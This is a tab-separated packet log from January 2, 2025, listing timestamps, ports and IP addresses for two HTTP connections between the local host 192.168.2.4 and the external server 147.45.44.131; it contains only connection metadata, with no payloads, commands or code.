Jan 2, 2025 19:12:59.272161007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.272171021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.272181034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.272192955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.272197008 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.272205114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.272228956 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.273036003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.273108006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.273118019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.273128986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.273138046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.273149967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.273153067 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.273190975 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.274045944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.274061918 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.274071932 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.274081945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.274092913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.274108887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.274110079 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.274137020 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.274154902 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.274972916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.274983883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.274996042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.275007010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.275017977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.275024891 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.275032043 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.275034904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.275063992 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.275863886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.275875092 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.275887012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.275897026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.275919914 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.275940895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.276490927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.276500940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.276550055 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.276880980 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.276890993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.276900053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.276909113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.276921034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.276923895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.276931047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.276951075 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.276969910 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.277693987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.277710915 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.277750015 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.278060913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278069973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278079033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278088093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278098106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278105021 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.278112888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278125048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278127909 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.278135061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278146029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278153896 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.278191090 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.278949976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278960943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278974056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278990984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.278990984 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.279004097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.279014111 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.279014111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.279026031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.279036999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.279048920 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.279056072 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.279078960 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.279093027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.279854059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.279863119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.279906988 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.280114889 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.357940912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.357965946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.357976913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.357989073 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358001947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358016014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358023882 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.358027935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358040094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358057976 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.358087063 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.358119011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358130932 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358149052 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358160973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358170986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.358175039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358211040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.358340025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358351946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358361959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.358385086 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.358409882 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.414761066 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.419632912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597837925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597860098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597870111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597882032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597892046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597902060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597912073 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597934961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597939968 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.597944975 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597956896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.597997904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598018885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598088980 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598129988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598140001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598150015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598160028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598180056 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598200083 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598282099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598293066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598303080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598315001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598319054 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598328114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598341942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598345995 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598355055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598372936 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598404884 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598543882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598593950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598604918 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598638058 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598669052 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598679066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598690033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598701954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598710060 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598726988 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598809958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598820925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598831892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598845005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.598850012 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.598875046 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599056959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599067926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599078894 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599100113 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599127054 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599133015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599143982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599159956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599170923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599201918 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599225998 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599379063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599390984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599400997 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599436998 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599448919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599463940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599473953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599486113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599490881 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599514961 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599546909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599556923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599567890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599585056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599589109 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599597931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599610090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599610090 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599622011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599637032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599644899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599648952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599656105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599663019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599677086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599689007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599701881 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.599703074 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599730015 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.599750042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.602766037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.602785110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.602823019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.602833033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.602833986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.602866888 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.602900982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.602935076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603003979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603044033 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.603048086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603065014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603077888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603086948 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.603090048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603115082 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.603166103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603183985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603224993 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.603240967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603250980 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603261948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603279114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.603317022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.603480101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603490114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.603526115 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.612284899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.686227083 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.742393017 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.776237965 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:01.437428951 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:01.442351103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:01.442430019 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:01.453085899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:01.457880020 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.071815014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.071831942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.071922064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.140115023 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.144925117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321058989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321073055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321082115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321091890 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321100950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321110010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321111917 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.321119070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321135044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321144104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321154118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321162939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321170092 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.321170092 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.321172953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.321214914 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.321214914 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.325972080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.367422104 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.409939051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.409951925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.409960985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.409977913 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.409986019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.409991026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410038948 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.410038948 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.410379887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410389900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410401106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410522938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.410720110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410789967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410790920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.410799026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410809994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410819054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.410834074 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.410892010 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.411492109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.411506891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.411515951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.411525011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.411534071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:02.411547899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.411564112 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:02.461174965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.364907980 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.369818926 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.545955896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.545969963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.545980930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.545990944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546000957 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546010971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546024084 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.546087027 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.546350002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546360016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546422958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.546552896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546564102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546575069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546602011 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.546780109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546789885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546807051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546817064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.546843052 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.546854973 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.634830952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.634845972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.634855986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.634865999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.634876966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.634907961 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.634953976 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.635088921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635097980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635166883 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.635226965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635245085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635255098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635265112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635274887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635277033 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.635334969 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.635334969 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.635730982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635751963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635761023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.635797977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.636084080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636095047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636105061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636120081 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636137962 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.636163950 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.636549950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636560917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636569977 CET	80	49731	147.45.44.131	192.168.2.4
